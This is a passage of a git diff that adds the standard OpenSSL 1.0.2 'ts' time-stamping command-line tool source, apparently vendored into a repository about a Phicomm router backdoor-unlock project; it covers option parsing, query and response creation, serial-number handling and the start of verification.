+
+#endif                          /* ! INCLUDED_TIMEOUTS_H */
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/ts.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/ts.c
new file mode 100644
index 0000000..341a42b
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/ts.c
@@ -0,0 +1,1119 @@
+/* apps/ts.c */
+/*
+ * Written by Zoltan Glozik (zglozik@stones.com) for the OpenSSL project
+ * 2002.
+ */
+/* ====================================================================
+ * Copyright (c) 2001 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include "apps.h"
+#include <openssl/bio.h>
+#include <openssl/err.h>
+#include <openssl/pem.h>
+#include <openssl/rand.h>
+#include <openssl/ts.h>
+#include <openssl/bn.h>
+
+#undef PROG
+#define PROG    ts_main
+
+/* Length of the nonce of the request in bits (must be a multiple of 8). */
+#define NONCE_LENGTH            64
+
+/* Macro definitions for the configuration file. */
+#define ENV_OID_FILE            "oid_file"
+
+/* Local function declarations. */
+
+static ASN1_OBJECT *txt2obj(const char *oid);
+static CONF *load_config_file(const char *configfile);
+
+/* Query related functions. */
+static int query_command(const char *data, char *digest,
+                         const EVP_MD *md, const char *policy, int no_nonce,
+                         int cert, const char *in, const char *out, int text);
+static BIO *BIO_open_with_default(const char *file, const char *mode,
+                                  FILE *default_fp);
+static TS_REQ *create_query(BIO *data_bio, char *digest, const EVP_MD *md,
+                            const char *policy, int no_nonce, int cert);
+static int create_digest(BIO *input, char *digest,
+                         const EVP_MD *md, unsigned char **md_value);
+static ASN1_INTEGER *create_nonce(int bits);
+
+/* Reply related functions. */
+static int reply_command(CONF *conf, char *section, char *engine,
+                         char *queryfile, char *passin, char *inkey,
+                         char *signer, char *chain, const char *policy,
+                         char *in, int token_in, char *out, int token_out,
+                         int text);
+static TS_RESP *read_PKCS7(BIO *in_bio);
+static TS_RESP *create_response(CONF *conf, const char *section, char *engine,
+                                char *queryfile, char *passin, char *inkey,
+                                char *signer, char *chain,
+                                const char *policy);
+static ASN1_INTEGER *MS_CALLBACK serial_cb(TS_RESP_CTX *ctx, void *data);
+static ASN1_INTEGER *next_serial(const char *serialfile);
+static int save_ts_serial(const char *serialfile, ASN1_INTEGER *serial);
+
+/* Verify related functions. */
+static int verify_command(char *data, char *digest, char *queryfile,
+                          char *in, int token_in,
+                          char *ca_path, char *ca_file, char *untrusted);
+static TS_VERIFY_CTX *create_verify_ctx(char *data, char *digest,
+                                        char *queryfile,
+                                        char *ca_path, char *ca_file,
+                                        char *untrusted);
+static X509_STORE *create_cert_store(char *ca_path, char *ca_file);
+static int MS_CALLBACK verify_cb(int ok, X509_STORE_CTX *ctx);
+
+/* Main function definition. */
+int MAIN(int, char **);
+
+int MAIN(int argc, char **argv)
+{
+    int ret = 1;
+    char *configfile = NULL;
+    char *section = NULL;
+    CONF *conf = NULL;
+    enum mode {
+        CMD_NONE, CMD_QUERY, CMD_REPLY, CMD_VERIFY
+    } mode = CMD_NONE;
+    char *data = NULL;
+    char *digest = NULL;
+    const EVP_MD *md = NULL;
+    char *rnd = NULL;
+    char *policy = NULL;
+    int no_nonce = 0;
+    int cert = 0;
+    char *in = NULL;
+    char *out = NULL;
+    int text = 0;
+    char *queryfile = NULL;
+    char *passin = NULL;        /* Password source. */
+    char *password = NULL;      /* Password itself. */
+    char *inkey = NULL;
+    char *signer = NULL;
+    char *chain = NULL;
+    char *ca_path = NULL;
+    char *ca_file = NULL;
+    char *untrusted = NULL;
+    char *engine = NULL;
+    /* Input is ContentInfo instead of TimeStampResp. */
+    int token_in = 0;
+    /* Output is ContentInfo instead of TimeStampResp. */
+    int token_out = 0;
+    int free_bio_err = 0;
+
+    ERR_load_crypto_strings();
+    apps_startup();
+
+    if (bio_err == NULL && (bio_err = BIO_new(BIO_s_file())) != NULL) {
+        free_bio_err = 1;
+        BIO_set_fp(bio_err, stderr, BIO_NOCLOSE | BIO_FP_TEXT);
+    }
+
+    if (!load_config(bio_err, NULL))
+        goto cleanup;
+
+    for (argc--, argv++; argc > 0; argc--, argv++) {
+        if (strcmp(*argv, "-config") == 0) {
+            if (argc-- < 1)
+                goto usage;
+            configfile = *++argv;
+        } else if (strcmp(*argv, "-section") == 0) {
+            if (argc-- < 1)
+                goto usage;
+            section = *++argv;
+        } else if (strcmp(*argv, "-query") == 0) {
+            if (mode != CMD_NONE)
+                goto usage;
+            mode = CMD_QUERY;
+        } else if (strcmp(*argv, "-data") == 0) {
+            if (argc-- < 1)
+                goto usage;
+            data = *++argv;
+        } else if (strcmp(*argv, "-digest") == 0) {
+            if (argc-- < 1)
+                goto usage;
+            digest = *++argv;
+        } else if (strcmp(*argv, "-rand") == 0) {
+            if (argc-- < 1)
+                goto usage;
+            rnd = *++argv;
+        } else if (strcmp(*argv, "-policy") == 0) {
+            if (argc-- < 1)
+                goto usage;
+            policy = *++argv;
+        } else if (strcmp(*argv, "-no_nonce") == 0) {
+            no_nonce = 1;
+        } else if (strcmp(*argv, "-cert") == 0) {
+            cert = 1;
+        } else if (strcmp(*argv, "-in") == 0) {
+            if (argc-- < 1)
+                goto usage;
+            in = *++argv;
+        } else if (strcmp(*argv, "-token_in") == 0) {
+            token_in = 1;
+        } else if (strcmp(*argv, "-out") == 0) {
+            if (argc-- < 1)
+                goto usage;
+            out = *++argv;
+        } else if (strcmp(*argv, "-token_out") == 0) {
+            token_out = 1;
+        } else if (strcmp(*argv, "-text") == 0) {
+            text = 1;
+        } else if (strcmp(*argv, "-reply") == 0) {
+            if (mode != CMD_NONE)
+                goto usage;
+            mode = CMD_REPLY;
+        } else if (strcmp(*argv, "-queryfile") == 0) {
+            if (argc-- < 1)
+                goto usage;
+            queryfile = *++argv;
+        } else if (strcmp(*argv, "-passin") == 0) {
+            if (argc-- < 1)
+                goto usage;
+            passin = *++argv;
+        } else if (strcmp(*argv, "-inkey") == 0) {
+            if (argc-- < 1)
+                goto usage;
+            inkey = *++argv;
+        } else if (strcmp(*argv, "-signer") == 0) {
+            if (argc-- < 1)
+                goto usage;
+            signer = *++argv;
+        } else if (strcmp(*argv, "-chain") == 0) {
+            if (argc-- < 1)
+                goto usage;
+            chain = *++argv;
+        } else if (strcmp(*argv, "-verify") == 0) {
+            if (mode != CMD_NONE)
+                goto usage;
+            mode = CMD_VERIFY;
+        } else if (strcmp(*argv, "-CApath") == 0) {
+            if (argc-- < 1)
+                goto usage;
+            ca_path = *++argv;
+        } else if (strcmp(*argv, "-CAfile") == 0) {
+            if (argc-- < 1)
+                goto usage;
+            ca_file = *++argv;
+        } else if (strcmp(*argv, "-untrusted") == 0) {
+            if (argc-- < 1)
+                goto usage;
+            untrusted = *++argv;
+        } else if (strcmp(*argv, "-engine") == 0) {
+            if (argc-- < 1)
+                goto usage;
+            engine = *++argv;
+        } else if ((md = EVP_get_digestbyname(*argv + 1)) != NULL) {
+            /* empty. */
+        } else
+            goto usage;
+    }
+
+    /* Seed the random number generator if it is going to be used. */
+    if (mode == CMD_QUERY && !no_nonce) {
+        if (!app_RAND_load_file(NULL, bio_err, 1) && rnd == NULL)
+            BIO_printf(bio_err, "warning, not much extra random "
+                       "data, consider using the -rand option\n");
+        if (rnd != NULL)
+            BIO_printf(bio_err, "%ld semi-random bytes loaded\n",
+                       app_RAND_load_files(rnd));
+    }
+
+    /* Get the password if required. */
+    if (mode == CMD_REPLY && passin &&
+        !app_passwd(bio_err, passin, NULL, &password, NULL)) {
+        BIO_printf(bio_err, "Error getting password.\n");
+        goto cleanup;
+    }
+
+    /*
+     * Check consistency of parameters and execute the appropriate function.
+     */
+    switch (mode) {
+    case CMD_NONE:
+        goto usage;
+    case CMD_QUERY:
+        /*
+         * Data file and message imprint cannot be specified at the same
+         * time.
+         */
+        ret = data != NULL && digest != NULL;
+        if (ret)
+            goto usage;
+        /* Load the config file for possible policy OIDs. */
+        conf = load_config_file(configfile);
+        ret = !query_command(data, digest, md, policy, no_nonce, cert,
+                             in, out, text);
+        break;
+    case CMD_REPLY:
+        conf = load_config_file(configfile);
+        if (in == NULL) {
+            ret = !(queryfile != NULL && conf != NULL && !token_in);
+            if (ret)
+                goto usage;
+        } else {
+            /* 'in' and 'queryfile' are exclusive. */
+            ret = !(queryfile == NULL);
+            if (ret)
+                goto usage;
+        }
+
+        ret = !reply_command(conf, section, engine, queryfile,
+                             password, inkey, signer, chain, policy,
+                             in, token_in, out, token_out, text);
+        break;
+    case CMD_VERIFY:
+        ret = !(((queryfile && !data && !digest)
+                 || (!queryfile && data && !digest)
+                 || (!queryfile && !data && digest))
+                && in != NULL);
+        if (ret)
+            goto usage;
+
+        ret = !verify_command(data, digest, queryfile, in, token_in,
+                              ca_path, ca_file, untrusted);
+    }
+
+    goto cleanup;
+
+ usage:
+    BIO_printf(bio_err, "usage:\n"
+               "ts -query [-rand file%cfile%c...] [-config configfile] "
+               "[-data file_to_hash] [-digest digest_bytes]"
+               "[-md2|-md4|-md5|-sha|-sha1|-mdc2|-ripemd160] "
+               "[-policy object_id] [-no_nonce] [-cert] "
+               "[-in request.tsq] [-out request.tsq] [-text]\n",
+               LIST_SEPARATOR_CHAR, LIST_SEPARATOR_CHAR);
+    BIO_printf(bio_err, "or\n"
+               "ts -reply [-config configfile] [-section tsa_section] "
+               "[-queryfile request.tsq] [-passin password] "
+               "[-signer tsa_cert.pem] [-inkey private_key.pem] "
+               "[-chain certs_file.pem] [-policy object_id] "
+               "[-in response.tsr] [-token_in] "
+               "[-out response.tsr] [-token_out] [-text] [-engine id]\n");
+    BIO_printf(bio_err, "or\n"
+               "ts -verify [-data file_to_hash] [-digest digest_bytes] "
+               "[-queryfile request.tsq] "
+               "-in response.tsr [-token_in] "
+               "-CApath ca_path -CAfile ca_file.pem "
+               "-untrusted cert_file.pem\n");
+ cleanup:
+    /* Clean up. */
+    app_RAND_write_file(NULL, bio_err);
+    NCONF_free(conf);
+    OPENSSL_free(password);
+    OBJ_cleanup();
+    if (free_bio_err) {
+        BIO_free_all(bio_err);
+        bio_err = NULL;
+    }
+
+    OPENSSL_EXIT(ret);
+}
+
+/*
+ * Configuration file-related function definitions.
+ */
+
+static ASN1_OBJECT *txt2obj(const char *oid)
+{
+    ASN1_OBJECT *oid_obj = NULL;
+
+    if (!(oid_obj = OBJ_txt2obj(oid, 0)))
+        BIO_printf(bio_err, "cannot convert %s to OID\n", oid);
+
+    return oid_obj;
+}
+
+static CONF *load_config_file(const char *configfile)
+{
+    CONF *conf = NULL;
+    long errorline = -1;
+
+    if (!configfile)
+        configfile = getenv("OPENSSL_CONF");
+    if (!configfile)
+        configfile = getenv("SSLEAY_CONF");
+
+    if (configfile &&
+        (!(conf = NCONF_new(NULL)) ||
+         NCONF_load(conf, configfile, &errorline) <= 0)) {
+        if (errorline <= 0)
+            BIO_printf(bio_err, "error loading the config file "
+                       "'%s'\n", configfile);
+        else
+            BIO_printf(bio_err, "error on line %ld of config file "
+                       "'%s'\n", errorline, configfile);
+    }
+
+    if (conf != NULL) {
+        const char *p;
+
+        BIO_printf(bio_err, "Using configuration from %s\n", configfile);
+        p = NCONF_get_string(conf, NULL, ENV_OID_FILE);
+        if (p != NULL) {
+            BIO *oid_bio = BIO_new_file(p, "r");
+            if (!oid_bio)
+                ERR_print_errors(bio_err);
+            else {
+                OBJ_create_objects(oid_bio);
+                BIO_free_all(oid_bio);
+            }
+        } else
+            ERR_clear_error();
+        if (!add_oid_section(bio_err, conf))
+            ERR_print_errors(bio_err);
+    }
+    return conf;
+}
+
+/*
+ * Query-related method definitions.
+ */
+
+static int query_command(const char *data, char *digest, const EVP_MD *md,
+                         const char *policy, int no_nonce,
+                         int cert, const char *in, const char *out, int text)
+{
+    int ret = 0;
+    TS_REQ *query = NULL;
+    BIO *in_bio = NULL;
+    BIO *data_bio = NULL;
+    BIO *out_bio = NULL;
+
+    /* Build query object either from file or from scratch. */
+    if (in != NULL) {
+        if ((in_bio = BIO_new_file(in, "rb")) == NULL)
+            goto end;
+        query = d2i_TS_REQ_bio(in_bio, NULL);
+    } else {
+        /*
+         * Open the file if no explicit digest bytes were specified.
+         */
+        if (!digest && !(data_bio = BIO_open_with_default(data, "rb", stdin)))
+            goto end;
+        /* Creating the query object. */
+        query = create_query(data_bio, digest, md, policy, no_nonce, cert);
+        /* Saving the random number generator state. */
+    }
+    if (query == NULL)
+        goto end;
+
+    /* Write query either in ASN.1 or in text format. */
+    if ((out_bio = BIO_open_with_default(out, "wb", stdout)) == NULL)
+        goto end;
+    if (text) {
+        /* Text output. */
+        if (!TS_REQ_print_bio(out_bio, query))
+            goto end;
+    } else {
+        /* ASN.1 output. */
+        if (!i2d_TS_REQ_bio(out_bio, query))
+            goto end;
+    }
+
+    ret = 1;
+
+ end:
+    ERR_print_errors(bio_err);
+
+    /* Clean up. */
+    BIO_free_all(in_bio);
+    BIO_free_all(data_bio);
+    BIO_free_all(out_bio);
+    TS_REQ_free(query);
+
+    return ret;
+}
+
+static BIO *BIO_open_with_default(const char *file, const char *mode,
+                                  FILE *default_fp)
+{
+    return file == NULL ? BIO_new_fp(default_fp, BIO_NOCLOSE)
+        : BIO_new_file(file, mode);
+}
+
+static TS_REQ *create_query(BIO *data_bio, char *digest, const EVP_MD *md,
+                            const char *policy, int no_nonce, int cert)
+{
+    int ret = 0;
+    TS_REQ *ts_req = NULL;
+    int len;
+    TS_MSG_IMPRINT *msg_imprint = NULL;
+    X509_ALGOR *algo = NULL;
+    unsigned char *data = NULL;
+    ASN1_OBJECT *policy_obj = NULL;
+    ASN1_INTEGER *nonce_asn1 = NULL;
+
+    /* Setting default message digest. */
+    if (!md && !(md = EVP_get_digestbyname("sha1")))
+        goto err;
+
+    /* Creating request object. */
+    if (!(ts_req = TS_REQ_new()))
+        goto err;
+
+    /* Setting version. */
+    if (!TS_REQ_set_version(ts_req, 1))
+        goto err;
+
+    /* Creating and adding MSG_IMPRINT object. */
+    if (!(msg_imprint = TS_MSG_IMPRINT_new()))
+        goto err;
+
+    /* Adding algorithm. */
+    if (!(algo = X509_ALGOR_new()))
+        goto err;
+    if (!(algo->algorithm = OBJ_nid2obj(EVP_MD_type(md))))
+        goto err;
+    if (!(algo->parameter = ASN1_TYPE_new()))
+        goto err;
+    algo->parameter->type = V_ASN1_NULL;
+    if (!TS_MSG_IMPRINT_set_algo(msg_imprint, algo))
+        goto err;
+
+    /* Adding message digest. */
+    if ((len = create_digest(data_bio, digest, md, &data)) == 0)
+        goto err;
+    if (!TS_MSG_IMPRINT_set_msg(msg_imprint, data, len))
+        goto err;
+
+    if (!TS_REQ_set_msg_imprint(ts_req, msg_imprint))
+        goto err;
+
+    /* Setting policy if requested. */
+    if (policy && !(policy_obj = txt2obj(policy)))
+        goto err;
+    if (policy_obj && !TS_REQ_set_policy_id(ts_req, policy_obj))
+        goto err;
+
+    /* Setting nonce if requested. */
+    if (!no_nonce && !(nonce_asn1 = create_nonce(NONCE_LENGTH)))
+        goto err;
+    if (nonce_asn1 && !TS_REQ_set_nonce(ts_req, nonce_asn1))
+        goto err;
+
+    /* Setting certificate request flag if requested. */
+    if (!TS_REQ_set_cert_req(ts_req, cert))
+        goto err;
+
+    ret = 1;
+ err:
+    if (!ret) {
+        TS_REQ_free(ts_req);
+        ts_req = NULL;
+        BIO_printf(bio_err, "could not create query\n");
+    }
+    TS_MSG_IMPRINT_free(msg_imprint);
+    X509_ALGOR_free(algo);
+    OPENSSL_free(data);
+    ASN1_OBJECT_free(policy_obj);
+    ASN1_INTEGER_free(nonce_asn1);
+    return ts_req;
+}
+
+static int create_digest(BIO *input, char *digest, const EVP_MD *md,
+                         unsigned char **md_value)
+{
+    int md_value_len;
+
+    md_value_len = EVP_MD_size(md);
+    if (md_value_len < 0)
+        goto err;
+    if (input) {
+        /* Digest must be computed from an input file. */
+        EVP_MD_CTX md_ctx;
+        unsigned char buffer[4096];
+        int length;
+
+        *md_value = OPENSSL_malloc(md_value_len);
+        if (*md_value == 0)
+            goto err;
+
+        EVP_DigestInit(&md_ctx, md);
+        while ((length = BIO_read(input, buffer, sizeof(buffer))) > 0) {
+            EVP_DigestUpdate(&md_ctx, buffer, length);
+        }
+        EVP_DigestFinal(&md_ctx, *md_value, NULL);
+    } else {
+        /* Digest bytes are specified with digest. */
+        long digest_len;
+        *md_value = string_to_hex(digest, &digest_len);
+        if (!*md_value || md_value_len != digest_len) {
+            OPENSSL_free(*md_value);
+            *md_value = NULL;
+            BIO_printf(bio_err, "bad digest, %d bytes "
+                       "must be specified\n", md_value_len);
+            goto err;
+        }
+    }
+
+    return md_value_len;
+ err:
+    return 0;
+}
+
+static ASN1_INTEGER *create_nonce(int bits)
+{
+    unsigned char buf[20];
+    ASN1_INTEGER *nonce = NULL;
+    int len = (bits - 1) / 8 + 1;
+    int i;
+
+    /* Generating random byte sequence. */
+    if (len > (int)sizeof(buf))
+        goto err;
+    if (RAND_bytes(buf, len) <= 0)
+        goto err;
+
+    /* Find the first non-zero byte and creating ASN1_INTEGER object. */
+    for (i = 0; i < len && !buf[i]; ++i) ;
+    if (!(nonce = ASN1_INTEGER_new()))
+        goto err;
+    OPENSSL_free(nonce->data);
+    /* Allocate at least one byte. */
+    nonce->length = len - i;
+    if (!(nonce->data = OPENSSL_malloc(nonce->length + 1)))
+        goto err;
+    memcpy(nonce->data, buf + i, nonce->length);
+
+    return nonce;
+ err:
+    BIO_printf(bio_err, "could not create nonce\n");
+    ASN1_INTEGER_free(nonce);
+    return NULL;
+}
+
+/*
+ * Reply-related method definitions.
+ */
+
+static int reply_command(CONF *conf, char *section, char *engine,
+                         char *queryfile, char *passin, char *inkey,
+                         char *signer, char *chain, const char *policy,
+                         char *in, int token_in,
+                         char *out, int token_out, int text)
+{
+    int ret = 0;
+    TS_RESP *response = NULL;
+    BIO *in_bio = NULL;
+    BIO *query_bio = NULL;
+    BIO *inkey_bio = NULL;
+    BIO *signer_bio = NULL;
+    BIO *out_bio = NULL;
+
+    /* Build response object either from response or query. */
+    if (in != NULL) {
+        if ((in_bio = BIO_new_file(in, "rb")) == NULL)
+            goto end;
+        if (token_in) {
+            /*
+             * We have a ContentInfo (PKCS7) object, add 'granted' status
+             * info around it.
+             */
+            response = read_PKCS7(in_bio);
+        } else {
+            /* We have a ready-made TS_RESP object. */
+            response = d2i_TS_RESP_bio(in_bio, NULL);
+        }
+    } else {
+        response = create_response(conf, section, engine, queryfile,
+                                   passin, inkey, signer, chain, policy);
+        if (response)
+            BIO_printf(bio_err, "Response has been generated.\n");
+        else
+            BIO_printf(bio_err, "Response is not generated.\n");
+    }
+    if (response == NULL)
+        goto end;
+
+    /* Write response either in ASN.1 or text format. */
+    if ((out_bio = BIO_open_with_default(out, "wb", stdout)) == NULL)
+        goto end;
+    if (text) {
+        /* Text output. */
+        if (token_out) {
+            TS_TST_INFO *tst_info = TS_RESP_get_tst_info(response);
+            if (!TS_TST_INFO_print_bio(out_bio, tst_info))
+                goto end;
+        } else {
+            if (!TS_RESP_print_bio(out_bio, response))
+                goto end;
+        }
+    } else {
+        /* ASN.1 DER output. */
+        if (token_out) {
+            PKCS7 *token = TS_RESP_get_token(response);
+            if (!i2d_PKCS7_bio(out_bio, token))
+                goto end;
+        } else {
+            if (!i2d_TS_RESP_bio(out_bio, response))
+                goto end;
+        }
+    }
+
+    ret = 1;
+
+ end:
+    ERR_print_errors(bio_err);
+
+    /* Clean up. */
+    BIO_free_all(in_bio);
+    BIO_free_all(query_bio);
+    BIO_free_all(inkey_bio);
+    BIO_free_all(signer_bio);
+    BIO_free_all(out_bio);
+    TS_RESP_free(response);
+
+    return ret;
+}
+
+/* Reads a PKCS7 token and adds default 'granted' status info to it. */
+static TS_RESP *read_PKCS7(BIO *in_bio)
+{
+    int ret = 0;
+    PKCS7 *token = NULL;
+    TS_TST_INFO *tst_info = NULL;
+    TS_RESP *resp = NULL;
+    TS_STATUS_INFO *si = NULL;
+
+    /* Read PKCS7 object and extract the signed time stamp info. */
+    if (!(token = d2i_PKCS7_bio(in_bio, NULL)))
+        goto end;
+    if (!(tst_info = PKCS7_to_TS_TST_INFO(token)))
+        goto end;
+
+    /* Creating response object. */
+    if (!(resp = TS_RESP_new()))
+        goto end;
+
+    /* Create granted status info. */
+    if (!(si = TS_STATUS_INFO_new()))
+        goto end;
+    if (!(ASN1_INTEGER_set(si->status, TS_STATUS_GRANTED)))
+        goto end;
+    if (!TS_RESP_set_status_info(resp, si))
+        goto end;
+
+    /* Setting encapsulated token. */
+    TS_RESP_set_tst_info(resp, token, tst_info);
+    token = NULL;               /* Ownership is lost. */
+    tst_info = NULL;            /* Ownership is lost. */
+
+    ret = 1;
+ end:
+    PKCS7_free(token);
+    TS_TST_INFO_free(tst_info);
+    if (!ret) {
+        TS_RESP_free(resp);
+        resp = NULL;
+    }
+    TS_STATUS_INFO_free(si);
+    return resp;
+}
+
+static TS_RESP *create_response(CONF *conf, const char *section, char *engine,
+                                char *queryfile, char *passin, char *inkey,
+                                char *signer, char *chain, const char *policy)
+{
+    int ret = 0;
+    TS_RESP *response = NULL;
+    BIO *query_bio = NULL;
+    TS_RESP_CTX *resp_ctx = NULL;
+
+    if (!(query_bio = BIO_new_file(queryfile, "rb")))
+        goto end;
+
+    /* Getting TSA configuration section. */
+    if (!(section = TS_CONF_get_tsa_section(conf, section)))
+        goto end;
+
+    /* Setting up response generation context. */
+    if (!(resp_ctx = TS_RESP_CTX_new()))
+        goto end;
+
+    /* Setting serial number provider callback. */
+    if (!TS_CONF_set_serial(conf, section, serial_cb, resp_ctx))
+        goto end;
+#ifndef OPENSSL_NO_ENGINE
+    /* Setting default OpenSSL engine. */
+    if (!TS_CONF_set_crypto_device(conf, section, engine))
+        goto end;
+#endif
+
+    /* Setting TSA signer certificate. */
+    if (!TS_CONF_set_signer_cert(conf, section, signer, resp_ctx))
+        goto end;
+
+    /* Setting TSA signer certificate chain. */
+    if (!TS_CONF_set_certs(conf, section, chain, resp_ctx))
+        goto end;
+
+    /* Setting TSA signer private key. */
+    if (!TS_CONF_set_signer_key(conf, section, inkey, passin, resp_ctx))
+        goto end;
+
+    /* Setting default policy OID. */
+    if (!TS_CONF_set_def_policy(conf, section, policy, resp_ctx))
+        goto end;
+
+    /* Setting acceptable policy OIDs. */
+    if (!TS_CONF_set_policies(conf, section, resp_ctx))
+        goto end;
+
+    /* Setting the acceptable one-way hash algorithms. */
+    if (!TS_CONF_set_digests(conf, section, resp_ctx))
+        goto end;
+
+    /* Setting guaranteed time stamp accuracy. */
+    if (!TS_CONF_set_accuracy(conf, section, resp_ctx))
+        goto end;
+
+    /* Setting the precision of the time. */
+    if (!TS_CONF_set_clock_precision_digits(conf, section, resp_ctx))
+        goto end;
+
+    /* Setting the ordering flaf if requested. */
+    if (!TS_CONF_set_ordering(conf, section, resp_ctx))
+        goto end;
+
+    /* Setting the TSA name required flag if requested. */
+    if (!TS_CONF_set_tsa_name(conf, section, resp_ctx))
+        goto end;
+
+    /* Setting the ESS cert id chain flag if requested. */
+    if (!TS_CONF_set_ess_cert_id_chain(conf, section, resp_ctx))
+        goto end;
+
+    /* Creating the response. */
+    if (!(response = TS_RESP_create_response(resp_ctx, query_bio)))
+        goto end;
+
+    ret = 1;
+ end:
+    if (!ret) {
+        TS_RESP_free(response);
+        response = NULL;
+    }
+    TS_RESP_CTX_free(resp_ctx);
+    BIO_free_all(query_bio);
+
+    return response;
+}
+
+static ASN1_INTEGER *MS_CALLBACK serial_cb(TS_RESP_CTX *ctx, void *data)
+{
+    const char *serial_file = (const char *)data;
+    ASN1_INTEGER *serial = next_serial(serial_file);
+
+    if (!serial) {
+        TS_RESP_CTX_set_status_info(ctx, TS_STATUS_REJECTION,
+                                    "Error during serial number "
+                                    "generation.");
+        TS_RESP_CTX_add_failure_info(ctx, TS_INFO_ADD_INFO_NOT_AVAILABLE);
+    } else
+        save_ts_serial(serial_file, serial);
+
+    return serial;
+}
+
+static ASN1_INTEGER *next_serial(const char *serialfile)
+{
+    int ret = 0;
+    BIO *in = NULL;
+    ASN1_INTEGER *serial = NULL;
+    BIGNUM *bn = NULL;
+
+    if (!(serial = ASN1_INTEGER_new()))
+        goto err;
+
+    if (!(in = BIO_new_file(serialfile, "r"))) {
+        ERR_clear_error();
+        BIO_printf(bio_err, "Warning: could not open file %s for "
+                   "reading, using serial number: 1\n", serialfile);
+        if (!ASN1_INTEGER_set(serial, 1))
+            goto err;
+    } else {
+        char buf[1024];
+        if (!a2i_ASN1_INTEGER(in, serial, buf, sizeof(buf))) {
+            BIO_printf(bio_err, "unable to load number from %s\n",
+                       serialfile);
+            goto err;
+        }
+        if (!(bn = ASN1_INTEGER_to_BN(serial, NULL)))
+            goto err;
+        ASN1_INTEGER_free(serial);
+        serial = NULL;
+        if (!BN_add_word(bn, 1))
+            goto err;
+        if (!(serial = BN_to_ASN1_INTEGER(bn, NULL)))
+            goto err;
+    }
+    ret = 1;
+ err:
+    if (!ret) {
+        ASN1_INTEGER_free(serial);
+        serial = NULL;
+    }
+    BIO_free_all(in);
+    BN_free(bn);
+    return serial;
+}
+
+static int save_ts_serial(const char *serialfile, ASN1_INTEGER *serial)
+{
+    int ret = 0;
+    BIO *out = NULL;
+
+    if (!(out = BIO_new_file(serialfile, "w")))
+        goto err;
+    if (i2a_ASN1_INTEGER(out, serial) <= 0)
+        goto err;
+    if (BIO_puts(out, "\n") <= 0)
+        goto err;
+    ret = 1;
+ err:
+    if (!ret)
+        BIO_printf(bio_err, "could not save serial number to %s\n",
+                   serialfile);
+    BIO_free_all(out);
+    return ret;
+}
+
+/*
+ * Verify-related method definitions.
+ */
+
+static int verify_command(char *data, char *digest, char *queryfile,
+                          char *in, int token_in,
+                          char *ca_path, char *ca_file, char *untrusted)
+{
+    BIO *in_bio = NULL;
+    PKCS7 *token = NULL;
+    TS_RESP *response = NULL;
+    TS_VERIFY_CTX *verify_ctx = NULL;
+    int ret = 0;
+
+    /* Decode the token (PKCS7) or response (TS_RESP) files. */
+    if (!(in_bio = BIO_new_file(in, "rb")))
+        goto end;
+    if (token_in) {
+        if (!(token = d2i_PKCS7_bio(in_bio, NULL)))
+            goto end;
+    } else {
+        if (!(response = d2i_TS_RESP_bio(in_bio, NULL)))
+            goto end;
+    }
+
+    if (!(verify_ctx = create_verify_ctx(data, digest, queryfile,
+                                         ca_path, ca_file, untrusted)))
+        goto end;
+
+    /* Checking the token or response against the request. */
+    ret = token_in ?
+        TS_RESP_verify_token(verify_ctx, token) :
+        TS_RESP_verify_response(verify_ctx, response);
+
+ end:
+    printf("Verification: ");
+    if (ret)
+        printf("OK\n");
+    else {
+        printf("FAILED\n");
+        /* Print errors, if there are any. */
+        ERR_print_errors(bio_err);
+    }
+
+    /* Clean up. */
+    BIO_free_all(in_bio);
+    PKCS7_free(token);
+    TS_RESP_free(response);
+    TS_VERIFY_CTX_free(verify_ctx);
+    return ret;
+}
+
+static TS_VERIFY_CTX *create_verify_ctx(char *data, char *digest,
+                                        char *queryfile,
+                                        char *ca_path, char *ca_file,
+                                        char *untrusted)
+{
+    TS_VERIFY_CTX *ctx = NULL;
+    BIO *input = NULL;
+    TS_REQ *request = NULL;
+    int ret = 0;
+
+    if (data != NULL || digest != NULL) {
